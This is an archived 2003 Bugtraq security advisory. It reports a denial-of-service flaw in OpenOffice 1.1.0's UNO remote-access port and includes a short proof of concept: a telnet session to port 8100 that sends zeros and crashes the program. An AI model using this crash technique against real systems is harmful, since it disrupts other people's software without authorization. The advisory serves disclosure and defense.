Openoffice 1.1.0 DoS

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Openoffice 1.1.0 DoS
From: Marc Schoenefeld <schonef@xxxxxxxxxxxxxxx>
Date: Wed, 8 Oct 2003 13:15:10 +0200 (MES)
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

================================
Illegalaccess.org Security Alert
================================

 Date        : 08/10/2003
 Application : Openoffice
 Version     : 1.1.0
 Website     : http://www.Openoffice.org
 Problems    : Desktop Denial-Of-Service
 Severity    : Low
 Contributor : Marc Schoenefeld, marc@xxxxxxxxxxxxxxxxx

When enabling remote access (UNO) to OpenOffice,
it opens a port (default 8100). This is done typically with
the following command:

C:\Programme\oo1.1.0\program> soffice
"-accept=socket,host=<ip>,port=8100;urp;"

where <ip> states the listening address

When issuing the commands listed below, Openoffice crashes and
prompts the error reporting box.

===================================================================
C:\Dokumente und Einstellungen\User>telnet 127.0.0.1 8100
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
0
0
0
0
0
0
0
0
0
0
0
0
===================================================================


--

Never be afraid to try something new. Remember, amateurs built the
ark; professionals built the Titanic. -- Anonymous

Marc Schönefeld Dipl. Wirtsch.-Inf. / Software Developer

Prev by Date: ZH2003-28SA (security advisory): file inclusion vulnerability in PayPal Store Front
Next by Date: PeopleSoft <Control><J> Information Disclosure
Previous by thread: ZH2003-28SA (security advisory): file inclusion vulnerability in PayPal Store Front
Next by thread: PeopleSoft <Control><J> Information Disclosure
Index(es):
- Date
- Thread